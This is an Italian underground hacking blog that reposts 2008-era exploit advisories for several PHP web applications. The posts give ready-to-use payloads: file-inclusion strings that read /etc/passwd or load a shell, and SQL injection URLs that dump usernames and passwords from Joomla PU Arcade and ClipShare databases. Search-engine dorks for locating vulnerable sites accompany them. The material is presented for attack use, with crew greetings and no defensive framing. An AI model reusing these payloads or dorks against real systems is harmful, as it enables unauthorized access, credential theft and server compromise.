h4ckarchive v2.2

La nuova risorsa italiana sull’hacking underground

Archive for the ‘Uncategorized’ Category

Nuovo nome del blog: t3chb0x

leave a comment »

Il nuovo nome del nostro blog è t3chb0x… Abbiamo anche cambiato indirizzo: http://t3chb0x.wordpress.com 😉

Written by TheDevil

18 giugno 2008 at 12:52 am

Pubblicato su Uncategorized

Liquid-Silver CMS 0.1 (update) LFI Vulnerability

leave a comment »

###### exploit : /Script/update/index.php?update=/[name of file wthout php] #####
###### #####
###### example : /Script/update/index.php?update=/home/user/shell #####
###### #####
###### other files: update=../../../../etc/passwd%00 #####
###### #####
###### H-T Team , v4 Team , Tryag , no-hack all my friend #####

Written by TheDevil

26 gennaio 2008 at 6:02 pm

Pubblicato su Uncategorized

Lama Software RFI Vulnerability

with one comment

[+]—————————————————————————-[+]
Lama Software kostenlos Remote file include
Scripts : Lama Software kostenlos
Discovered By : QTRinux
Scripts site : http://www.lama-software.de/
Thanks To : # Tryag.cc # cold z3ro HackTeach.org # AlQaTaRi # Mr.sh4r3s # POISON #
site : http://www.TRYAG.CC
dork : © 2007 by Lama Software – Accomm Solutions GmbH & Co. KG
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
admin/functions/inc.steps.access_error.php?MY_CONF[classRoot]=Shell
admin/functions/inc.steps.check_login.php?MY_CONF[classRoot]=Shell
admin/functions/inc.steps.init_system.php?MY_CONF[classRoot]=Shell
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Written by TheDevil

26 gennaio 2008 at 6:01 pm

Pubblicato su Uncategorized

PHP Nuke 8.0 Final `sid` sql injection exploit for Search module

leave a comment »

# UNPUBLISHED RST/GHC EXPLOIT
# PHP Nuke `sid` sql injection exploit for Search module
# POST method –
# the best for version 8.0 FINAL
# (c)oded by Foster & 1dt.w0lf

Link: http://milw0rm.com/exploits/4965

Written by TheDevil

26 gennaio 2008 at 5:59 pm

Pubblicato su Uncategorized

Joomla Component PU Arcade SQL Injection Vulnerability

with 4 comments

#########################################################################
Joomla Component PU Arcade Remote SQL Injection Exploit
#########################################################################

## AUTHOR : HouSSamix of H-T TeaM
We are ( HouSSamix _ ToXiC350 _ CoNaN )

## HOME : http://no-hack.net

## Script : PU Arcade Joomla Component ( Tested in version 2.0.3 & 2.1.3 Beta )

## Download : http://www.pragmaticutopia.com/

## DorKs : PU Arcade by http://www.pragmaticutopia.com
inurl:index.php?option=com_puarcade
inurl:/option,com_puarcade/

## EXPLOIT :

http://server.com/Path/index.php?option=com_puarcade&Itemid=

92&fid=-1%20union%20select%20concat(username,0x3a,password)%20from%20jos_users–

## GREETZ : GoLd_M , RoMaNcYxHaCkEr , Jiko , cx0x and all musulmans hackers

#########################################################################
Joomla Component PU Arcade Remote SQL Injection Exploit
#########################################################################

Written by TheDevil

4 gennaio 2008 at 4:23 am

Pubblicato su Uncategorized

ClipShare SQL Injection Vulnerability

with 644 comments

#########################################################################
video sharing http://www.clip-share.com Remote SQL Injection Exploit All Version
#########################################################################
AUTHOR :Krit webmaster of http://www.thaishadow.com
HOME : http://www.thaishadow.com
Download : http://www.clip-share.com/
###########################################################################
DorKs :inurl:/uprofile.php?UID=
or
“Powered by clipshare”
###########################################################################
## EXPLOIT :
http://server.com/Path/uprofile.php?UID=1+and+1=2+union+select+1,2

,concat(uid,char(58),username,char(58),pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2

4,25,26,27,28,29,30,31,32+from+signup+limit+0,20/*
###########################################################################
## GREETZ : Exploiters,Pongz,{OHM},Usermode,windows98SE,azazel,Tesz,Mr`Ping
###########################################################################

Written by TheDevil

4 gennaio 2008 at 4:22 am

Pubblicato su Uncategorized

SanyBee Gallery 0.1.1 LFI Vulnerability

leave a comment »

################################################################################
# SanyBee Gallery 0.1.1 (p) local File Inclusion
#
# Script Name: SanyBee Gallery 0.1.1
#
# D.Script: http://www.easy-script.com/scripts-dl/SanyBeeGallery_V0.1.0.zip
#
# Discovered by: jackal
#
# contact: mi3adi@hotmail.fr
################################################################################

*==Exploit==*
================================================================

http://www.target.com/%5BSanyBee Gallery 0.1.1]/index.php?p=[ LFI ]%00
================================================================

Thanx: [cold-zer0]==&==[kof]==&==[firas]

GreeTz: [M]oRoCCaN [S]aBoTaGe [T]eaM

Written by TheDevil

4 gennaio 2008 at 4:21 am

Pubblicato su Uncategorized